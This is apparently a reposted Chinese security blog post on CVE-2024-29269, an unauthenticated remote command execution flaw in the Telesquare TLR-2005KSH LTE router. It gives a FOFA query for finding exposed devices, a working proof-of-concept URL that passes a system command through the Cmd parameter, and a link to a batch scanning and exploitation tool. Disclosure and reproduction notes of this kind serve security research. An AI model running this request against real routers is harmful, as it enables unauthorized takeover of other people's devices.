CVE-2024-29269__RCE
TLR-2005KSH介绍
TLR-2005KSH 是一款LTE路由器产品,通过无线连接到LTE无线网络来支持有线数据通信。
.通过无线LTE <-> 有线互联网自动节省(故障转移)通过WAN端口和LTE支持互联网冗余。
.LTE和WCDMA无线冗余支持。
.POS、LTE备份可在付款断开时实现连续的互联网连接。
.4个LAN Potter支持允许与PC和笔记本电脑的额外连接。
.DC5V-12V电源支持和保险丝安装,防止产品因过电压而损坏。
.提供端口转发、过滤器、DMZ/超级DMZ等路由器功能。
.远程控制,远程固件管理工具提供远程维护。
.VPN 客户端提供的VPN功能。
FOFA
title="Login to TLR-2005KSH"
漏洞复现
漏洞描述:
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款Sk Telecom Lte路由器。Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。 攻击者可以利用该漏洞通过Cmd参数执行未经授权的系统命令,并获取服务器权限。
影响版本:
TLR-2005Ksh 1.0.0 和 1.1.4
漏洞复现:
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
批量扫描/利用:
工具仅用于安全测试,任何非法攻击本人概不负责
工具仅用于安全测试,任何非法攻击本人概不负责
https://github.com/YongYe-Security/CVE-2024-29269
存在漏洞会打印并保存在result.txt
原文始发于微信公众号(YongYe 安全实验室):CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论